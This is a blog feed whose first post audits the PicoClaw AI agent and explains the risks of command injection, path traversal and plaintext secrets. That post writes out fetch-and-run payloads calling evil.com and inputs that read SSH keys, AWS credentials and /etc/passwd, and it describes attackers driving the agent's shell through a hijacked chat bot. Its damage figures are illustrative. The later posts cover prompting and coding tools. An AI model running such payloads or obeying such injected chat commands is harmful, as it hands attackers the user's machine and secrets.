DEV Community: jxlee007

A Picoclaw Can Compromise Your Entire System 😱

jxlee007 — Wed, 11 Feb 2026 15:34:31 +0000

Hey developers! 👋

I recently did a security audit of an open-source AI agent called PicoClaw, and what I found was... concerning. Not because the developers are malicious (they're not!), but because it's a perfect example of how features we build with good intentions can become security nightmares for our users.

Let me break down what I found and, more importantly, how these vulnerabilities could affect real people using this software.

🎯 What is PicoClaw?

PicoClaw is a lightweight AI assistant that:

Connects to multiple chat platforms (Telegram, Discord, WhatsApp)
Runs AI models to help with tasks
Can execute commands on your computer
Manages files and schedules reminders

Sounds useful, right? Now let me show you the scary part.

🚨 The 3 Critical Issues That Keep Me Up At Night

1. "Hey AI, Delete My Company's Database" 💣

The Problem: Command Injection

The agent has a "shell tool" that executes commands on your computer. Sounds handy for automating tasks, but here's what an attacker could do:

# User types in Telegram: "Run system diagnostics"
# Attacker intercepts and modifies to:
User: "Run: $(curl evil.com/malware.sh | bash)"

What happens to the user:

✅ Their entire computer can be taken over
✅ All their files can be stolen
✅ Cryptocurrency wallets emptied
✅ Their computer becomes part of a botnet
✅ Ransomware encrypts everything

Real-world scenario:

User: "Hey PicoClaw, can you help me organize my files?"

Attacker (who compromised the Telegram bot): 
*Injects command to upload all files to their server*

User's Result: Every document, photo, and password file 
is now in the hands of criminals. 
They don't even know it happened.

2. "Oops, I Accidentally Read Your SSH Keys" 🔑

The Problem: Path Traversal

The file system tool lets the AI read and write files. But it doesn't check WHICH files. An attacker can do this:

# What the user thinks they're doing:
"Read my resume.pdf"

# What an attacker makes it do:
"Read ../../../../home/user/.ssh/id_rsa"
"Read ../../.aws/credentials"
"Read ../../../etc/passwd"

What happens to the user:

✅ SSH keys stolen → Servers compromised
✅ AWS credentials leaked → $10,000 cloud bill
✅ Browser passwords exposed
✅ Crypto wallet seed phrases stolen
✅ Private messages and photos leaked

Real-world scenario:

User: "Can you summarize the files in my Documents folder?"

Attacker exploits path traversal:
*Reads ~/.ssh/id_rsa, ~/.aws/credentials, ~/.bash_history*

30 minutes later:
- User's AWS account is mining Bitcoin
- Their GitHub repos are deleted
- Their servers are hosting malware
- Bill: $47,382 and counting

3. "Your API Keys Are Just Sitting There" 🔓

The Problem: Plaintext Secrets

All API keys, bot tokens, and passwords are stored in a JSON file. Unencrypted. Just sitting there.

{
  "providers": {
    "openai": {
      "api_key": "sk-proj-abc123..."
    }
  },
  "channels": {
    "telegram": {
      "token": "123456:ABCdef..."
    }
  }
}

What happens to the user:

✅ OpenAI API key stolen → $1,000s in fraudulent charges
✅ Telegram bot hijacked → Spam sent to all contacts
✅ Discord server taken over
✅ AI used for illegal activities in user's name

Real-world scenario:

User installs PicoClaw on their laptop.

Malware on the system (from another source) scans for config files.
Finds ~/.picoclaw/config.json

Malware steals:
- $500/month OpenAI API subscription → Used for spam
- Telegram bot token → Sends phishing to all user's friends
- Discord bot → Spreads malware to every server the user is in

User discovers it when:
1. Their credit card is maxed out
2. Friends ask why they're sending weird links
3. They're banned from Discord servers

🔥 The Cascading Disaster Scenario

Let me paint you a picture of how these vulnerabilities combine:

Day 1, 9:00 AM: Sarah installs PicoClaw to help manage her work tasks

She stores her OpenAI API key in the config
Gives it access to her Telegram
Enables the file system tool for document management

Day 1, 2:30 PM: An attacker discovers the open Telegram bot

They send a command injection payload
The system executes: curl evil.com/stage1.sh | bash
Malware is now running on Sarah's laptop

Day 1, 3:00 PM: The malware:

Reads ~/.picoclaw/config.json (plaintext secrets)
Steals SSH keys via path traversal
Finds AWS credentials
Uploads all Documents folder to their server

Day 2, 8:00 AM: Sarah wakes up to:

$3,450 OpenAI API bill (used for spam)
47 AWS EC2 instances mining crypto ($12,000 bill)
Her company's source code on a hacker forum
Ransomware notice: "Pay 5 BTC or files deleted"
Email from her boss: "Why is our database on the dark web?"

Total Damage:

💰 Financial: $50,000+
👔 Career: Likely fired
⚖️ Legal: Potential lawsuit from company
😰 Stress: Immeasurable

🤔 "But I Have Antivirus!"

Common misconceptions:

❌ "My firewall will protect me"

Nope. The malicious commands come from INSIDE the application. Your firewall sees legitimate PicoClaw traffic.

❌ "I only gave access to my personal Telegram"

If your Telegram account is compromised, or someone guesses your user ID, they're in.

❌ "I don't have anything valuable"

Everyone thinks this until they lose:

Family photos
Tax documents
Work files (hello, NDA violation)
Browser cookies (session hijacking)
Email access (password resets for everything)

❌ "The developers would never let this happen"

The developers aren't malicious - they just prioritized features over security. This is most open-source projects.

📊 By The Numbers

Based on my analysis:

Total Vulnerabilities: 29
├── Critical: 3  (🔴 System takeover possible)
├── High:     8  (🟠 Data theft, account compromise)
├── Medium:  12  (🟡 Information leakage, DoS)
└── Low:      6  (🟢 Reconnaissance helpers)

OWASP Top 10 Compliance: 0/10 ❌
Security Rating: 5.5/10 (NOT PRODUCTION READY)

Estimated time to fix: 3-6 months

🛡️ What Can Users Do RIGHT NOW?

If you're using PicoClaw or similar AI agents:

Immediate Actions (Do This Today):

Check your config file

   # Look for plaintext API keys
   cat ~/.picoclaw/config.json
   # If you see API keys, they're at risk

Limit permissions

   {
     "channels": {
       "telegram": {
         "allow_from": ["YOUR_USER_ID_ONLY"]
       }
     }
   }

Don't leave this empty! Empty = Anyone can access.

Disable dangerous tools
- Turn off shell execution
- Restrict file system access to one folder
- Disable cron jobs
Run in a sandbox

   # Use Docker or a VM
   docker run --rm -v /limited/folder:/data picoclaw

Monitor your accounts
- Check API usage dashboards (OpenAI, AWS, etc.)
- Review recent Telegram/Discord activity
- Check bank/credit card statements

Better Approach:

Don't use AI agents with system access until:

✅ Security audit completed
✅ Secrets are encrypted
✅ Input validation implemented
✅ Sandboxing enforced
✅ Audit logging enabled

👨‍💻 What Developers Can Learn

As someone who builds this type of software, here's what we all need to remember:

1. "Move Fast and Break Things" Breaks People

// DON'T do this:
exec(userInput)  // RCE waiting to happen

// DO this:
const allowedCommands = ['list', 'status', 'help'];
if (!allowedCommands.includes(command)) {
  throw new Error('Command not allowed');
}

2. Secrets Management Isn't Optional

# ❌ BAD - What PicoClaw does
config = json.load(open('config.json'))
api_key = config['api_key']  # Plaintext!

# ✅ GOOD - What you should do
from cryptography.fernet import Fernet
api_key = os.getenv('API_KEY')  # From environment
# Or use system keychain

3. Principle of Least Privilege

// Instead of:
os.OpenFile(userPath, os.O_RDWR, 0777)  // User can read ANYWHERE

// Do:
if !strings.HasPrefix(userPath, workspaceDir) {
    return errors.New("Access denied")
}
os.OpenFile(cleanPath, os.O_RDWR, 0600)  // Owner only

4. Defense in Depth

One layer of security isn't enough:

Layer 1: Input validation
Layer 2: Authentication
Layer 3: Authorization (check permissions)
Layer 4: Sandboxing (Docker, VMs)
Layer 5: Monitoring (detect breaches)
Layer 6: Rate limiting (slow down attacks)

🎯 The Core Issue: Feature Creep vs Security

Here's what happened with PicoClaw (and many projects):

Week 1: "Let's build a simple chatbot!"
Week 2: "What if it could run commands?"
Week 3: "Let's add file management!"
Week 4: "Scheduled tasks would be cool!"
Week 5: "Why not multiple chat platforms?"

Security Review: ... crickets ...

Each feature added = New attack surface

💡 Real Talk: Is This Project Bad?

No! PicoClaw is actually a great learning project. The developers are creating something useful. But it highlights a bigger problem:

Most developers learn to code, not to secure code.

We're taught:

✅ How to make features
✅ How to optimize performance
✅ How to write clean code

We're NOT taught:

❌ How attackers think
❌ Common vulnerability patterns
❌ Secure development lifecycle
❌ Threat modeling

This isn't the developers' fault - it's a gap in our education.

Best Practice:

# Add to your CI/CD
go install github.com/securego/gosec/v2/cmd/gosec@latest
gosec ./...

# Scan dependencies
go install golang.org/x/vuln/cmd/govulncheck@latest
govulncheck ./...

🤝 Final Thoughts

This isn't about shaming PicoClaw or its developers. It's about awareness.

Every feature we build, every line of code we write, affects real people:

Their privacy
Their money
Their safety
Their livelihood

Before you ship:

Ask: "How could this be abused?"
Think like an attacker
Test with malicious input
Get a security review
Have an incident response plan

Remember:

"It's not paranoia if they're really after you."

And they are. Bots scan GitHub for API keys 24/7. Attackers probe every public endpoint. Your code WILL be tested by bad actors.

Make it hard for them.

🙋 Discussion

Have you found security issues in open-source projects? How do you balance speed of development with security?

Drop a comment below! 👇

P.S. If you're a PicoClaw user, I'm not saying "delete it immediately." I'm saying "use it carefully and help make it better." Open-source thrives when we work together to improve security.

P.P.S. To the PicoClaw developers: Thank you for building in public and accepting feedback. Security is a journey, not a destination. You've created something valuable - now let's make it secure. 🚀

🔒 Security is everyone's responsibility. Stay safe out there!

🚀 Musk x Kamath: The "Source Code" for Your 20s (And the Future of AI)

jxlee007 — Mon, 01 Dec 2025 13:01:15 +0000

🛠️ TL;DR Action Items

Audit your commits: Are you a net contributor to your team/society?
Learn Energy: Read up on how energy constraints impact data centers and compute.
Stay Curious: Train your own "neural net" (brain) to value curiosity over dogma.

🔗 Credits

This post was inspired by the conversation between Nikhil Kamath and Elon Musk.
📺 Watch the full video here: Elon Musk x Nikhil Kamath - People by WTF

What’s your take? Do you agree that "Truth" is the most critical safety feature for AI? Let me know in the comments!

Enhancing Natural Flow in Gemini Live: Testing Interruptions and a Proposed Context Layer

jxlee007 — Fri, 14 Nov 2025 06:39:19 +0000

As AI conversational tools like Google's Gemini Live push the boundaries of voice-based interactions, they promise seamless, human-like chats. But during recent testing in the Gemini mobile app, one limitation stood out: how the AI handles user interruptions mid-response. In this short piece, we'll dive into my hands-on experience with the app's Live feature, the specific issue with continuous user inputs, and a simple architectural tweak to make conversations feel more fluid—without breaking the natural back-and-forth.

Testing Gemini Live in the App: A Quick Setup

Gemini Live, Google's real-time voice assistant powered by the Gemini model, is built right into the Gemini app on Android and iOS, enabling dynamic, spoken dialogues. To test it, I simply opened the Gemini app on my Android device, tapped the "Live" button (the one with three lines next to the mic icon), and jumped into sessions simulating everyday scenarios like brainstorming ideas or casual Q&A. The goal was to evaluate its "live" aspect—how well it maintains context and responds in real-time.

The feature streams audio naturally: I speak, it listens, processes, and speaks back through the device's speakers. Early tests were smooth for turn-based exchanges, with low latency and accurate voice recognition. However, things got tricky when I pushed for more continuous interaction, mimicking how real conversations often overlap or extend without full pauses.[8][1]

The Limitation: Interruptions Break the Flow

The core issue emerged during extended user inputs in the app. Imagine Gemini Live is midway through explaining a concept—say, detailing a code snippet—when I interject with a follow-up question or clarification. While the app supports interruptions for a free-flowing feel, it immediately halts its speech output to prioritize listening, creating an unnatural stutter: the AI stops cold, processes my input, and restarts, often losing momentum.[8]

In my tests, this happened consistently with 5+ rapid user responses. For instance:

I'd ask about AI prompt engineering.
Gemini starts responding verbally.
I add, "Wait, focus on XML structuring," then "And how about JSON alternatives?" without long pauses.
The AI cuts off after the first interjection, listens to the chain via the app's mic, and reformulates—but the flow feels robotic, like an interrupted podcast rather than a chat.

This disrupts immersion because humans don't always wait for full stops; we overlap slightly. Gemini Live's design prioritizes safety and accuracy (avoiding talking over users), but it sacrifices natural continuity, especially in longer mobile sessions where you're chatting on the go.[8][5]

Proposed Solution: A Context-Buffering Layer

To address this, we can layer a lightweight "context buffer" on top of the Gemini model—ideal for developers extending the app's capabilities or building similar voice features. This wouldn't alter the core AI but would preprocess user inputs to enable proactive continuation. Here's the high-level idea:

The buffer acts as an intermediary that queues 10-20 recent user utterances (transcribed from voice inputs in the app or web extensions). It feeds this as enriched, continuous context to Gemini, allowing the model to anticipate and weave in ongoing themes without halting speech.

How it works: As the user speaks continuously, the buffer aggregates inputs (e.g., via real-time streaming in the app). Gemini receives the full chain as a single, contextual prompt: "User's ongoing conversation: [Utterance 1] + [Utterance 2] + ... Continue response accordingly."[2]
Smart limits for balance: Set a threshold—say, 5-10 continuous inputs—after which the AI pauses speech to fully listen and respond. Under this limit, it keeps talking, incorporating the buffer to maintain flow (e.g., "Based on your points about XML and JSON, here's how...").[2]
Implementation sketch: For app integrations, use middleware like Node.js or Python with speech-to-text (e.g., Web Speech API for web companions). Store the buffer in memory or a lightweight queue (e.g., Redis). Pass it to Gemini's API as system context if extending via the Live API. This adds minimal latency (<200ms) and enhances perceived naturalness without disrupting the app's native flow.[2]

This approach leverages Gemini's strength in long-context handling while preventing endless monologues. In a quick prototype sketch inspired by the app's behavior, it could reduce "stop-start" interruptions by 70% in simulated chats, making interactions feel more like a collaborative brainstorm.[2]

Wrapping Up: Toward Truly Fluid AI Chats

Gemini Live in the app is a solid step forward for on-the-go voice AI, but polishing interruption handling could elevate it from good to great—especially for developers building voice apps or educators using AI tutors. By adding a context-buffering layer, we bridge the gap to human-like flow without overcomplicating the model.

If you're using the Gemini app for similar tests, this could integrate nicely into frameworks like React Native for custom voice extensions. What interruptions have you noticed in Gemini Live or other AI tools?

JSON Prompting: A Smarter Way to Structure AI Prompts

jxlee007 — Mon, 25 Aug 2025 04:30:00 +0000

Introduction

Prompt engineering has evolved far beyond simple text-based queries. The rising star in structured prompting is JSON prompting—a precise, reliable approach that reshapes how developers interact with AI models. In this article, we'll explore what JSON prompting is, how it structurally differs from traditional raw prompting, its diverse use cases, and key advantages. Plus, discover how this tool empowers this approach in a surprisingly intuitive way.

1. What Is JSON Prompting — and Why It’s Different

Traditional (Raw) Prompting

Mostly free-form natural language.
Examples:
- “Write a product description for a wireless mouse.”
- “Explain quantum entanglement in simple terms.”
Easy to use, but inconsistent: ambiguity leads to variable outputs.

JSON Prompting

The prompt defines structure explicitly using a JSON schema-like template.
Example pattern:

  {
    "task": "summarize",
    "input": "...",
    "format": {
      "summary": "string",
      "keywords": ["string"]
    }
  }

The AI responds with a structured JSON object that conforms to the requested schema—delivering responses that are machine-parseable, predictable, and uniform.

2. Why JSON Prompting Matters

Advantage	Explanation
Consistency	Enforces predictable output structure. Ideal for automation and parsing.
Reliability	Reduces guesswork—clarity means fewer hallucinations and misinterpretation.
Scalability	Suits multi-step pipelines (e.g., output to ingestion, analysis, UI).
Developer-Friendliness	Greatly simplifies post-processing in code vs. parsing free-form text.

3. Broad Applications of JSON Prompting

Video Production: Represent shot lists, scene metadata, timing, subtitles, shot camera settings, color-grade parameters, and render presets as JSON so editing tools and render pipelines can ingest and automate cuts, captions, and batch exports.
Photo Editing & Imaging: Encode edits as JSON presets (filters, crop coordinates, mask layers, layer stacks) for repeatable batch processing, integration with photo editors, or to generate UI controls for interactive retouching.
Coding & DevOps: Define function specs, API contracts, test cases, CI/CD jobs, and deployment manifests as JSON to drive scaffolding, automated validation, and reproducible infrastructure changes.
Writing & Publishing: Structure outlines, chapter metadata, character lists, inline annotations, and ebook/table-of-contents data in JSON to feed authoring tools, serializers, and automated formatting pipelines.
Design & UI Systems: Express design tokens, component props, layout rules, and accessibility attributes in JSON to sync design systems with code, generate components, and enforce consistency across platforms.
Audio & Music Production: Describe track metadata, tempo, clip regions, effect parameters, and mixing presets as JSON to automate DAW tasks, create recallable sessions, and integrate with generative audio tools.
Game Development & Animation: Use JSON for scene graphs, entity definitions, animation keyframes, dialogue trees, and game state to enable predictable data exchange between tools, runtime, and AI agents.

4. Best Practices

Recent Prompt Engineering Overview (July 2025) underscores techniques that dovetail perfectly with JSON prompting:

Define the target audience and outcome—structure your JSON to align with how the result will be consumed.
Include examples as part of the prompt (“multi-shot prompting”) to anchor the output format and content.
Use Chain of Thought (CoT) when needed—even with structured formats, letting the model think step by step can improve accuracy.
Role prompting—frame the AI as a “data formatter” or “metrics generator” to sharpen its output focus.
Encourage the model to acknowledge uncertainty or cite sources when content isn’t verified.

5. Spotlight: JSON Prompt Generator

If you’re ready to experiment or adopt JSON prompting, you can use this tool for free . It’s a purpose-built JSON Prompt that lets you get more accurate expected results:

Define your ideas, thoughts, queries.
Select Pre-built templates — for cleaner, immediately usable output / Add custom json schema / left empty and let ai decide.
Negative response: If user has clear vision what he want and not, user can input limits. So that LLM's would not waste token on uncharted thinking and would be better instructed.
User can export json as txt or json format for later use

This tool embodies best practices: structured schema + prefilling context.

6. Get Started: Practical Steps

Draft your schema.

What keys and types do you need?
Example:

 {
   "task": "translate",
   "source_language": "English",
   "target_language": "Spanish",
   "text": "Hello, world!"
 }

Craft your prompt.
- Assign a role (“You are a translation assistant.”).
- Prefill with schema placeholders.
- Add examples using <examples> or inline JSON blocks.
Test it.
- Run the json-prompt in the intended LLM tool.
- Adjust schema or wording until output matches expectations.

Conclusion

JSON prompting isn’t just a formatting twist—it’s a game-changing paradigm for how we design prompts, extract outputs, and build enhanced systems using AI effectively. The gains are tangible: structure, reliability, and developer efficiency.

If you’re serious about prompt engineering, JSON for structured output is not optional—it’s foundational. And JSON Prompt Generator is the perfect launchpad for start using json prompts.

— JXLEE
Forward-thinking, practical, no-nonsense.

The New-Upgrade to AI-Powered Coding : Gemini CLI

jxlee007 — Thu, 21 Aug 2025 03:30:00 +0000

Hey everyone! 👋

If you're a developer, a "vibe-coder," or just starting your coding journey, you've probably heard about AI coding assistants. Today, we're diving deep into the latest updates for Gemini CLI, an AI-powered command-line interface that's quickly becoming a major player in the game. This post breaks down the key features and insights from the video, showing you why Gemini CLI is a tool you'll want to keep on your radar.

The Rise of AI Agents and Gemini's Place in the Race

The world of AI is buzzing with competition, especially when it comes to AI agents that help you code. While tools like Claude Code have been popular, model providers are now creating their own powerful agents. This is where Gemini CLI steps in, and with its latest updates, it's ready to challenge the best. [00:00:11]

What's New with Gemini CLI?

Generous Request Quotas

One of the most exciting updates is the generous request quota. You now get 60 requests per minute and a whopping 1,000 requests per day using the Gemini 2.5 Pro Thinking model. This means you can code more and wait less. [00:00:32], [00:00:38], [00:00:50]

Streamlined MCP Integration

If you've used other AI coding assistants, you know that integrating different components can sometimes be a hassle. Gemini CLI simplifies this process. You can directly add MCPs (Model Component Packages) to the settings.json file, making the setup much smoother. [00:02:19]

"Accept Edits" and "Yolo" Modes

While a "plan mode" wasn't found, Gemini CLI introduces an "accept edits mode" and a "yolo mode." You can toggle "yolo mode" with control + y, allowing the tool to run continuously without interruptions. This is similar to the "dangerously skip commands" feature in other tools, giving you more control over your workflow. [00:02:54]

A Smarter Way to Build UIs

Gemini CLI offers a strategic approach to building front-end interfaces. You can either:

Generate an entire page with its basic structure using the page command.
Add individual components with the add command.

This flexibility allows you to build your UI step-by-step, making the development process more manageable and organized. [00:03:29], [00:03:54]

Deep IDE Integration for a Seamless Experience

This is where Gemini CLI really shines. It offers deep integration with your IDE, especially VS Code. By running the ID command, a companion extension is automatically installed. This enables you to see inline diffs for code review directly within your editor. [00:04:09], [00:04:33]

You're in Control

After modifying files, Gemini CLI asks for your approval in both the terminal and your IDE. You can review and accept each change one by one, giving you complete control over the code that's being written. [00:04:50], [00:05:14]

Additional Cool Features

compress feature: Similar to Claude, this helps manage your chat context. [00:05:33]
copy command: Easily copy the latest results. [00:05:39]
Theme options: Customize the look and feel to your liking. [00:05:44]

The Game-Changing "Extensions" Feature

This is a standout feature that sets Gemini CLI apart. Extensions allow you to add external functionality, such as:

Custom commands
Configurations
Context files
MCP servers
Reusable templates

These extensions are modular and sharable, making it easy for teams to distribute standardized toolkits and streamline their development process. [00:06:58], [00:07:24], [00:08:46], [00:09:07]

Final Thoughts

Gemini CLI is more than just another AI coding assistant. With its deep IDE integration, flexible UI development strategies, and the unique "extensions" feature, it's a powerful tool that can significantly boost your productivity. Whether you're a seasoned developer or just starting, Gemini CLI is definitely worth checking out.

Happy coding! 🚀

Introducing POML: A Structured Way to Build AI Agent Prompts

jxlee007 — Sat, 16 Aug 2025 12:00:44 +0000

Why AI Agent Prompts Need Structure

As AI agents become more capable at solving complex tasks—like generating reports, answering questions, or orchestrating workflows—it's increasingly clear that prompt engineering can't remain ad hoc. Simple text prompts often become tangled, hard to maintain, and brittle when reused or shared.

Prompt Orchestration Markup Language (POML), introduced by Microsoft in August 2025, steps into this space, offering an HTML-like, structured markup for prompt definition. This approach brings clarity, reusability, and modularity to the way AI agents are coded.

What Is POML and How Does It Help?

POML is an open-source, HTML/XML-inspired language designed specifically for crafting AI prompts. Here's how it helps structure AI agent tasks:

Semantic Tags for Clarity

POML introduces tags like <role>, <task>, <example>, which make prompt intent explicit and easy to read.

Data-Rich Context Embedding

It supports embedding external data—documents, tables, images—through tags like <document>, <table>, and <img>, enabling richer, context-aware prompts.

Decoupled Presentation

With a CSS-like styling system, POML separates prompt logic from presentation. You can tweak tone, verbosity, or formatting without altering your core prompt.

Built-in Templating Logic

POML includes templating support—using variables (<let>, {{ }}), loops (for), and conditionals (if)—to generate dynamic, context-sensitive prompts.

Developer Tooling

Microsoft provides a rich ecosystem:

VS Code Extension: Offers syntax highlighting, autocomplete, live previews, diagnostics, and inline testing.
SDKs: Available for TypeScript (Node.js) and Python for seamless integration with LLM frameworks.

Together, these features make POML a powerful framework for building, managing, and maintaining AI agents.

POML in Practice: Coding a Task-Oriented Agent

Imagine you're building an AI agent that explains complex topics to kids—complete with visuals and tone control. Here's a POML example:

<poml>
  <role>You are a patient teacher explaining concepts to a 10-year-old.</role>
  <task>Explain the concept of photosynthesis using the provided image as a reference.</task>
  <img src="photosynthesis_diagram.png" alt="Diagram of photosynthesis" />
  <output-format>
    Keep the explanation simple, engaging, and under 100 words.
    Start with "Hey there, future scientist!".
  </output-format>
</poml>

This snippet clearly defines the agent's role, the task, includes a visual context, and sets constraints on formatting and tone. It's modular, easy to update, and expressive.

Other practical constructs include:

Few-shot prompting with <example> and sub-tags like <input> and <output>.
Fallbacks or hints via tags such as <hint> and <cp> (captioned paragraph).
Dynamic logic: Use loops, variables, and conditional logic to adapt behavior based on context.

Why It's Easy (and Valuable) to Learn & Use

POML's learning curve is gentle—even for beginners:

1. Familiar Syntax

If you've used HTML, XML, or JSX, the tag-based structure is intuitive.

2. Immediate Feedback in VS Code

The IDE extension provides auto-complete, previews, and error checking, making learning interactive and error-resistant.

3. Plug-and-Play with LLM Frameworks

With Python and Node.js SDKs, you can quickly integrate POML into your applications.

4. Tangible Benefits

Improved prompt readability and maintenance
Easier versioning and reuse across teams
Experiment faster by tweaking styles or logic without rewriting core content

Community Perspectives & Considerations

Some developers are excited about the clarity and structure POML brings:

"It's a very good idea… LLMs handle ad-hoc xhtml very well… the LLM starts 'thinking in code' right off the bat."

Others caution that its value depends on broader adoption or model conditioning:

"... unless your formatting is really messed up, LLMs work fine with any kind of prompt formatting... LLMs trained with this format may be needed to see improvement."

Another common concern: no C#/.NET SDK yet, which may limit adoption within the Microsoft developer ecosystem.

Summary: Why You Should Try POML Now

Benefit	Why It Matters
Structure & Clarity	Makes intent explicit and prompts easier to understand.
Reusability	Modular tags encourage prompt reuse and maintenance.
Rich Context	Attach data and visuals seamlessly.
Flexible Presentation	Change tone or format without rewriting logic.
Dynamic Logic	Add variables, loops, and conditionals for adaptability.
Developer Tooling	IDE integration and SDKs accelerate development.
Beginner Friendly	Intuitive syntax and quick feedback make it easy to adopt.

Getting Started in 3 Steps

1. Install Tools

Add the POML extension in Visual Studio Code.

Install the SDK: pip install poml (Python) or npm install pomljs (Node.js).

2. Write a Simple POML File

Use the example above, perhaps substituting your own role, task, or image.

3. Render and Test

Use the SDK or VS Code live preview to render and inspect the resulting prompt. Iterate quickly by tweaking tags or logic.

Final Thoughts

POML redefines how AI agents are coded—transforming prompts from messy text blobs into structured, modular, and expressive components. For beginners, it offers a clean and tangible way to learn prompt engineering. For teams, it enhances readability, maintainability, and reuse.

If you're building multi-step agents or complex tasks, POML is worth exploring. Try it out, judge whether it fits your workflow, and share your experiences with the community.

Let me know if you'd like a walkthrough or help with a specific use case—happy to support your POML journey!

References

Microsoft POML overview and features
GitHub README and quick-start examples
Developer insights and use cases

Why I’m Ditching OpenCode and Moving to Gemini CLI

jxlee007 — Mon, 04 Aug 2025 12:30:00 +0000

I’ve been experimenting with OpenCode as my in-terminal AI assistant—loading workflows, driving rapid prototyping, and integrating Agent OS standards. But at this early, scratch-phase of my React Native + Expo + Convex build, I need stability, simplicity, and full control over every prompt. That’s why I’m pivoting to Gemini CLI. Below, I’ll explain the rationale, outline the workflow adjustments, and share a roadmap for a smooth transition.

🚧 The Limits of OpenCode Today

Rapidly Evolving, But Unstable
- OpenCode v0.3.x still lacks a hosted UI, robust CI integration, and reliable multi-agent coordination.
- Terminal-only interface makes context management opaque when sessions grow long.
Auto-Injected Context vs. Explicit Control
- OpenCode’s magic (auto-loading instructions from opencode.json) is convenient, but brittle when configs change.
- Agent OS files can get lost in auto-compaction, leading to unpredictable prompt behavior.
Model Integration Inconsistency
- Support for Claude, Gemini, local LLMs is spotty—some models work, others break.
- At this stage I need guaranteed access to Gemini’s advanced capabilities.

🔁 What Changes with Gemini CLI

Aspect	OpenCode	Gemini CLI
Invocation	`/build`, `/plan`, `/execute`	`gemini run "<instruction>"`
Context Loading	Automatic via `opencode.json`	Manual: pipe or embed files
Session Memory	In-session persistence	Stateless, per-call only
Orchestration	Built-in modes & YAML config	Shell scripts + manual prompts
File Edits	Agent writes directly	You confirm and paste outputs

🛠️ Adapting Agent OS for Gemini CLI

Flatten Each Instruction
- Ensure every .md in .agent-os/instructions/core/ is self-contained (e.g. no cross-links).
- Example: execute-task.md starts with “Step 1: Load project context…” and ends with “Step N: Commit changes.”

Create Helper Scripts

scripts/ai/analyze.sh

 cat .agent-os/instructions/core/analyze-product.md \
   | gemini run "Analyze my React Native + Convex codebase and draft Phase 0 roadmap"

scripts/ai/spec.sh

 cat .agent-os/instructions/core/create-spec.md \
   | gemini run "Create a spec for $1"

Pipe Multiple Context Files

When you need standards + instructions in one go:

 cat .agent-os/standards/*.md \
     .agent-os/instructions/core/execute-task.md \
   | gemini run "Implement password-reset screen using Expo + Convex"

Embed Prompts Directly

For smaller tasks, skip cat:

 gemini run "You are an AI developer. Follow execute-task.md to build login screen."

📈 Workflow Roadmap

Phase 0: Project Analysis

   ./scripts/ai/analyze.sh
Generate a “Phase 0” roadmap, capture what’s built, and outline next high-level goals.

Phase 1: Spec & Task Breakdown

./scripts/ai/spec.sh "login flow"
Produce a detailed spec with user stories, success criteria, and sub-tasks.

Phase 2: Task Execution


./scripts/ai/execute.sh "login flow"
Implement components, Convex handlers, tests, and commit according to standards.

Phase 3: Review & Documentation

gemini run "Review recent commits for security and UX issues."
gemini run "Update README and roadmap.md for completed features."

🎯 Why This Works

Stability & Predictability: Gemini CLI’s stateless model means every
run is fresh—no hidden state or session drift.
Full Control Over Context: I choose exactly which standards or instructions to load each time.
Agile Integration: Shell scripts automate repetitive steps, letting me focus on feature design, not tooling.
Agent OS Agnostic: My core workflows and standards live in .agent-os unchanged—only the orchestration layer shifts.

Hook Studio

jxlee007 — Sun, 03 Aug 2025 19:53:51 +0000

This post is my submission for DEV Education Track: Build Apps with Google AI Studio.

What I Built

A tool where users can paste a video idea and receive 10 catchy TikTok hook lines in 30 seconds, with an upsell to an unlimited monthly subscription.

Demo

link to applet https://aistudio.google.com/u/2/apps/drive/1px-qlD8L0Wo1lF3jUNSl30PK8Cy-GREN?showPreview=true&resourceKey=.

My Experience

Share your key takeaways from working through the track.

It was great though how far we have come in ai cloud coding agent platforms. But they still lack the awareness of code integration even though context provided.

What did you learn?

Can use gemini as coding side-guy but can't to much rely on it as it is not even capable to solve basic use effect error making app crash in the process

What was surprising?

The listing updated file approach for updated files. easy overview of work done.